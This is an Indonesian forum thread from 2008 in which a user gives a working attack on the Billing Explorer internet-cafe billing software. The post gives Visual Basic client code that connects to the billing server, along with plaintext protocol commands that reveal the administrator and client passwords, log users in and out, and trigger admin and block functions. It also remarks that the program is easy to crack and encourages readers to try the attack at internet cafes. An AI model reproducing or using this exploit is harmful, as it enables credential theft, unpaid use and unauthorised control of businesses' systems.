Forum Komunitas

Forum bebas Buat Semua Kalangan
 
IndeksPortalCalendarFAQPencarianAnggotaGroupPendaftaranLogin
Login
Username:
Password:
Login otomatis: 
:: Lupa password?
SEO
CamelPark SEO tools - Google PageRank

Share | 
 

 Memanfaatkan Kelemahan Billing Explorer

Go down 
PengirimMessage
AntiThrust
PRAJURIT
PRAJURIT


Male
Jumlah posting : 34
Age : 38
Lokasi : Kapolda Surabaya
Job/hobbies : Anti Kemapanan
Registration date : 03.07.08

PostSubyek: Memanfaatkan Kelemahan Billing Explorer   Thu Jul 03, 2008 10:02 pm

Sebelum masuk ke inti permasalahan, ada yang perlu anda persiapkan:
- Coba download program demo nya di www.billingexplorer.com Server program dan client program
- Setelah berhasil mendownload ke duanya, silahkan anda install terlebih dahulu.
- Apabila proses installasi selesai, silahkan anda coba jalankan kedua program tersebut pada satu komputer.
- Jalankan program server terlebih dahulu kemudian program clientnya
- Secara default passwordnya akan berisi 008
- ok saya anggap anda semua udah bisa menjalankannya.

Nah apabila selesai proses diatas coba anda jalankan hanya program servernya saja. Kita akan liat kelemahan yang terjadi pada koneksinya.

Kalo kalian pake program packet snipper mungkin akan kelihatan, data apa saja yang dikirim ke client…….Setelah diamati beberapa menit dengan program packetsnipper ternyata setiap data yang dikirim ke client melalui winsock tidak terproteksi atau dalam kata lain hanya berupa plaintext saja…ops….ternyata….he…he…. :spiteful:

Okeh kita lanjut lagi, jika dilihat pada data yang dikirim oleh program server selalu diawali dengan ‘YYY’ dan sebaliknya apabila dikirim dari client ke server akan diawali dengan ‘XXX’ (tanpa curek).

(”Mungkin hal seperti ini akan berakibat fatal, ini bisa kita jadikan contoh bahwa data yang dikirim diusahakan harus terenkripsi untuk menghindari dan meminimalisasi pencurian data2 yang berbentuk plain text.”)

Ada beberapa perintah yang dikirim dari client ke server seperti:

XXX$personal$2$HIPERSEKS$

kalo saya gak salah artikan perintah diatas, menjadi spt ini:
XXX -> Perintah dari client
$ -> sebagai seperator atau pemisah parameter
personal -> type login yang digunakan user
$ -> sebagai seperator atau pemisah parameter
2 -> No PC Client yang telah di setting
$ -> sebagai seperator atau pemisah parameter
HIPERSEKS -> Nama yang digunakan oleh user

Maka kesimpulannya kita bisa login ke program server tanpa program client bawaanya dan kita bisa ganti dengan program kecil buatan sendiri.

Coba anda buat satu project dengan:
1 form, 1 winsock control, 2 commandbutton dan 2 textbox
untuk text1 rubah properti Multiline= True dengan Scrollbars=Both

Private Sub Command1_Click ()
SOCK.Close
‘// Masukan IPAddress Servernya dengan Port 1500 (default port)
SOCK.Connect “192.168.0.1r43;, “1500r43;
End Sub

Private Sub Command2_Click ()
If SOCK.State = sckConnected Then SOCK.SendData Text2.Text
End Sub

Private Sub SOCK_DataArrival( ByVal bytesTotal As Long )
Dim Data As String
SOCK.GetData Data
Text1.SelText = Data & vbCrLf & String (50, “-”) & vbCrLf
End Sub

setelah selesai koding diatas coba anda jalankan, lakukan koneksi keserver dengan menekan tombol command1. Apabila berhasil koneksi ke server coba anda tuliskan beberapa perintah dibawah ini pada textbox2 dan diakhiri dengan menekan tombol Command2.

Perintah:
XXX$passY$2$

perintah diatas digunakan untuk melihat password client dan password server pada PC Client No 2 (dua). hasil data yang dikirim dari server ke client dengan menyertakan perintah diatas akan terlihat seperti ini:

YYY$passY$008$Warnet Integral$JL. Prof.Bunyamin 667 Purwokerto 0281-642492$Email info_008@yahoo.com - http://www.billingexplorer.com$111

kalo dilihat pada kata ‘008r42; dan ‘111r42;, ini dapat diartikan sebagai password Administrator dan Password PC Client.

kita bisa klik tombol admin pada program clientnya, dan masukan passwordnya.
anda bisa mencoba beberapa perintah dibawah ini:
1. XXX$personal$2$HIPERSEKS$
(Login pada PC no 2 dengan nama user HIPERSEKS)
2. XXX$stop$2$HIPERSEKS
(untuk logout dari billing)
3. XXX$con$2$HIPERSEKS
4. XXX$infod2$2$
5. XXX$ablock$2$
6. XXX$admin$2$Admin
7. XXX$tutup$2$$

Anda bisa cari lagi perintah2 yg lain dengan menggunakan packet snipper seperti ‘EtherDetect Packet Sniffer’.

Selain itu ada beberapa kelemahan lain yang terdapat pada program ini, seperti tidak diproteksinya file executable dengan program-program compress exe, spt UPX,PE-COMPAT ataupun yg lain. ini sangat memudahkan untuk di CRack.

Sekedar info, program yang saya coba adalah Billing-Explorer Ver 4.40 Grand R-14a. yang di compile dengan visual basic v 5.0

Jadi kalo jalan-jalan ke warnet dan kebetulan billing nya menggunakan program ini, hmmm.m.m..mmmm…sekalian bisa dicoba…nih….
Kembali Ke Atas Go down
Lihat profil user http://Surabayahackerlink.org
Admin
ADMIN
ADMIN
avatar

Male
Jumlah posting : 82
Age : 24
Lokasi : http://forumku.catsboard.com
Job/hobbies : Mengadmin Forum
Registration date : 29.06.08

PostSubyek: Re: Memanfaatkan Kelemahan Billing Explorer   Thu Jul 03, 2008 10:13 pm

waw ternyata biling warnet kayak gitu yah

_________________


Salam Kenal,
Saya Admin numpang ngepost.


Kembali Ke Atas Go down
Lihat profil user http://forumku.catsboard.com
 
Memanfaatkan Kelemahan Billing Explorer
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Poin-poin kelemahan AJAX
» bantuin ane dong
» <JUAL> KAWASAKI NINJA 250 R 2009/08
» HONDA GL PRO
» biodata darry

Permissions in this forum:Anda tidak dapat menjawab topik
Forum Komunitas :: HOBBY :: Komputer :: Teknologi-
Navigasi: